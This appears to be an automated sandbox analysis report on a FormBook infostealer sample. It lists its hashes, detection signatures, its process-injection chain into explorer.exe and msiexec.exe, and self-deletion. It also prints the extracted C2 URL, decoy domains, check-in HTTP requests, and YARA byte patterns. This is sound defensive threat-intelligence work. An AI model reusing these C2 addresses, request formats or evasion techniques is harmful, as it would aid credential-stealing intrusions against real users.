Loading ...

Play interactive tourEdit tour

Analysis Report g1EhgmCqCD.exe

Overview

General Information

Sample Name:g1EhgmCqCD.exe
Analysis ID:404135
MD5:5551346aa9f251895021b95a2a7cc390
SHA1:acbcecf7599d3c33f6f2a36c0947cfc633d0a406
SHA256:9e189d8d48a66d2f53c972275642da7cbc8ad51b20f04cf1d592bef360db50cf
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • g1EhgmCqCD.exe (PID: 7100 cmdline: 'C:\Users\user\Desktop\g1EhgmCqCD.exe' MD5: 5551346AA9F251895021B95A2A7CC390)
    • g1EhgmCqCD.exe (PID: 1748 cmdline: C:\Users\user\Desktop\g1EhgmCqCD.exe MD5: 5551346AA9F251895021B95A2A7CC390)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 7036 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 7028 cmdline: /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cats16.com/8u3b/"], "decoy": ["pipienta.com", "wisdomfest.net", "jenniferreich.com", "bigcanoehomesforless.com", "kayandbernard.com", "offerbuildingsecrets.com", "benleefoto.com", "contactlesssoftware.tech", "statenislandplumbing.info", "lifestylemedicineservices.com", "blazerplanning.com", "fnatic-skins.club", "effectivemarketinginc.com", "babyshopit.com", "2000deal.com", "k12paymentcemter.com", "spwakd.com", "lesreponses.com", "abundando.com", "hawkspremierfhc.com", "midwestmadeclothing.com", "kamuakuinisiapa.com", "swirlingheadjewelry.com", "donelys.com", "stiloksero.com", "hoangphucsolar.com", "gb-contracting.com", "girlboyfriends.com", "decadejam.com", "glassfullcoffee.com", "todoparaconstruccion.com", "anygivenrunday.com", "newgalaxyindia.com", "dahlonegaforless.com", "blue-light.tech", "web-evo.com", "armmotive.com", "mollysmulligan.com", "penislandbrewer.com", "wgrimao.com", "dxm-int.net", "sarmaayagroup.com", "timbraunmusician.com", "amazoncovid19tracer.com", "peaknband.com", "pyqxlz.com", "palomachurch.com", "surfboardwarehouse.net", "burundiacademyst.com", "pltcoin.com", "workinglifestyle.com", "vickybowskill.com", "ottawahomevalues.info", "jtrainterrain.com", "francescoiocca.com", "metallitypiercing.com", "lashsavings.com", "discjockeydelraybeach.com", "indicraftsvilla.com", "tbq.xyz", "arfjkacsgatfzbazpdth.com", "appsend.online", "cunerier.com", "orospucocuguatmaca.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.g1EhgmCqCD.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.g1EhgmCqCD.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.g1EhgmCqCD.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        3.2.g1EhgmCqCD.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.g1EhgmCqCD.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cats16.com/8u3b/"], "decoy": ["pipienta.com", "wisdomfest.net", "jenniferreich.com", "bigcanoehomesforless.com", "kayandbernard.com", "offerbuildingsecrets.com", "benleefoto.com", "contactlesssoftware.tech", "statenislandplumbing.info", "lifestylemedicineservices.com", "blazerplanning.com", "fnatic-skins.club", "effectivemarketinginc.com", "babyshopit.com", "2000deal.com", "k12paymentcemter.com", "spwakd.com", "lesreponses.com", "abundando.com", "hawkspremierfhc.com", "midwestmadeclothing.com", "kamuakuinisiapa.com", "swirlingheadjewelry.com", "donelys.com", "stiloksero.com", "hoangphucsolar.com", "gb-contracting.com", "girlboyfriends.com", "decadejam.com", "glassfullcoffee.com", "todoparaconstruccion.com", "anygivenrunday.com", "newgalaxyindia.com", "dahlonegaforless.com", "blue-light.tech", "web-evo.com", "armmotive.com", "mollysmulligan.com", "penislandbrewer.com", "wgrimao.com", "dxm-int.net", "sarmaayagroup.com", "timbraunmusician.com", "amazoncovid19tracer.com", "peaknband.com", "pyqxlz.com", "palomachurch.com", "surfboardwarehouse.net", "burundiacademyst.com", "pltcoin.com", "workinglifestyle.com", "vickybowskill.com", "ottawahomevalues.info", "jtrainterrain.com", "francescoiocca.com", "metallitypiercing.com", "lashsavings.com", "discjockeydelraybeach.com", "indicraftsvilla.com", "tbq.xyz", "arfjkacsgatfzbazpdth.com", "appsend.online", "cunerier.com", "orospucocuguatmaca.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: g1EhgmCqCD.exeVirustotal: Detection: 19%Perma Link
          Source: g1EhgmCqCD.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: g1EhgmCqCD.exeJoe Sandbox ML: detected
          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: g1EhgmCqCD.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: g1EhgmCqCD.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msiexec.pdb source: g1EhgmCqCD.exe, 00000003.00000002.736006293.0000000003790000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.689209294.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: g1EhgmCqCD.exe, 00000003.00000002.736006293.0000000003790000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: g1EhgmCqCD.exe, 00000003.00000002.728612173.0000000001960000.00000040.00000001.sdmp, msiexec.exe, 00000009.00000002.910212121.0000000000E60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: g1EhgmCqCD.exe, msiexec.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.689209294.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 4x nop then pop edi3_2_0040C368
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 4x nop then pop esi3_2_004157FE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi9_2_001DC368
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop esi9_2_001E57FE

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.cats16.com/8u3b/
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.kayandbernard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.palomachurch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=OOVfeLyiAWIpMBFTQ6m1xWirhq5hDDYdrnFBGiAZzRO7gqk2ccIpVztzXoI7ESdS0nQl&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.gb-contracting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=JlfdOX0KzvBKJCwgzl05144UYnW9L68BcaCAZdJQAkSKjAz8k9yDpbSclDCZ+PzEALYQ&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.effectivemarketinginc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.donelys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.timbraunmusician.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=mgRUTtjP8oa9OY5PRVEI9pvNIm77vLp11T7wLcVaXT+EQBswbtHCc7JJdGZTw0GPMHIV&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.anygivenrunday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=/wAP08hkjicc6Jt0eNBrV8xVMyK0vdY+Qr+E6nWTlRrbM9gWbC2ePToIBG3Sa1gtWFqW&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.2000deal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.kayandbernard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.palomachurch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=OOVfeLyiAWIpMBFTQ6m1xWirhq5hDDYdrnFBGiAZzRO7gqk2ccIpVztzXoI7ESdS0nQl&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.gb-contracting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=JlfdOX0KzvBKJCwgzl05144UYnW9L68BcaCAZdJQAkSKjAz8k9yDpbSclDCZ+PzEALYQ&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.effectivemarketinginc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.donelys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.timbraunmusician.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=mgRUTtjP8oa9OY5PRVEI9pvNIm77vLp11T7wLcVaXT+EQBswbtHCc7JJdGZTw0GPMHIV&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.anygivenrunday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?DzrXY=/wAP08hkjicc6Jt0eNBrV8xVMyK0vdY+Qr+E6nWTlRrbM9gWbC2ePToIBG3Sa1gtWFqW&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1Host: www.2000deal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.kayandbernard.com
          Source: g1EhgmCqCD.exe, 00000001.00000003.651135793.0000000005B80000.00000004.00000001.sdmpString found in binary or memory: http://en.wikip
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: g1EhgmCqCD.exe, 00000001.00000002.667858038.00000000029F1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000004.00000002.911535792.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp, g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com$d
          Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comI
          Source: g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
          Source: g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comfr
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comnic
          Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comu
          Source: g1EhgmCqCD.exeString found in binary or memory: http://www.churchsw.org/church-projector-project
          Source: g1EhgmCqCD.exeString found in binary or memory: http://www.churchsw.org/repository/Bibles/
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: g1EhgmCqCD.exe, 00000001.00000003.653172373.0000000005B7E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html3
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: g1EhgmCqCD.exe, 00000001.00000002.667751786.00000000011E0000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: g1EhgmCqCD.exe, 00000001.00000002.667751786.00000000011E0000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comiona
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: g1EhgmCqCD.exe, 00000001.00000003.649504763.0000000005B98000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/8
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn6
          Source: g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnH
          Source: g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnKr4
          Source: g1EhgmCqCD.exe, 00000001.00000003.649286426.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnr
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr-
          Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krn
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
